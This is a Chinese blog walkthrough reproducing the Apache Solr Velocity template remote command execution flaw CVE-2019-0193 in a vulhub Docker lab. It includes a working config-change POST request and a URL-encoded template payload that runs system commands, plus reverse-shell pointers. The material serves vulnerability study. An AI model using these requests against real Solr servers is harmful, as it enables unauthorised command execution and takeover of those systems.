zoukankan      html  css  js  c++  java

  • Apache solr远程命令执行(CVE-2019-0193)

    solr简介;

    Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。


    漏洞描述:

    该漏洞的产生是由于两方面的原因:

    当攻击者可以直接访问Solr控制台时,可以通过发送类似/节点名/config的POST请求对该节点的配置文件做更改

    apache solr默认继承VelocityResponseWriter插件,在该插件的初始化参数中的params.resource.loader.enabled这个选项是用来控制是否允许参数资源加载器在solr请求参数中指定模板,默认设置是false。

    当设置params.resource.loader.enabled时为true时,将允许用户通过设置请求中的参数来指定相关资源的加载,这也就意味着攻击者可以通过构造一个具有威胁的攻击请求,在服务器上进行命令执行。

    影响版本:
    包括且不限于8.2.0(最新版本)

    5.4.1/5.5.0

    6.6.1/6.6.3

    7.0.1/7.1.0/7.2.1/7.3.0/7.4.0/7.5.0/7.7.1/7.7.2

    8.1.0/8.1.1/8.2.0


    漏洞复现:

    docker启动服务

    cd /vulhub/solr/CVE-2019-0193/

    docker-compose up –d

    创建一个结合

    docker-compose exec solr bash bin/solr create_core –c test –d example/example-DIH/solr/db

    搭建好后默认端口为8983,访问http://ip:8983即可

    image

    利用前提:攻击者需要知道Solr服务中Core的名称才能执行攻击,如上图所示test是core的名称

    直接构造POST请求,在/solr/test/config目录POST一下数据(修改Core的配置),开始params.resource.loader.enabled

    image

    POST /solr/test/config HTTP/1.1
    Host: 192.168.21.130:8983
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:70.0) Gecko/20100101 Firefox/70.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Connection: close
    Upgrade-Insecure-Requests: 1
    Cache-Control: max-age=0
    Content-Length: 259


    {
       "update-queryresponsewriter": {
         "startup": "lazy",
         "name": "velocity",
         "class": "solr.VelocityResponseWriter",
         "template.base.dir": "",
         "solr.resource.loader.enabled": "true",
         "params.resource.loader.enabled": "true"
       }
    }

    使用公开exp

    image

    GET /solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1

    Host: 192.168.21.130:8983

    Content-Length: 2

    反弹shell

    执行命令  http://www.jackson-t.ca/runtime-exec-payloads.html

    image

    将生成的命令填入到exp中

    监听端口

    image
  • 相关阅读:
    Python--day62--什么时候用GET请求和POST请求
    Python--day62--ORM的使用
    使用 vs code 搭建vue项目(一)
    jquery如何模拟分页-小白进阶
    JavaScript 实现的4种数字千位符格式化方法
    web秀
    五十个UI设计资源网站
    基于 HTML5 WebGL 的 水泥工厂可视化系统
    ASP.NET MVC图片管理(上传,预览与显示)
    jQuery使用FormData上传文件
  • 原文地址:https://www.cnblogs.com/sup3rman/p/13359345.html
Copyright © 2011-2022 走看看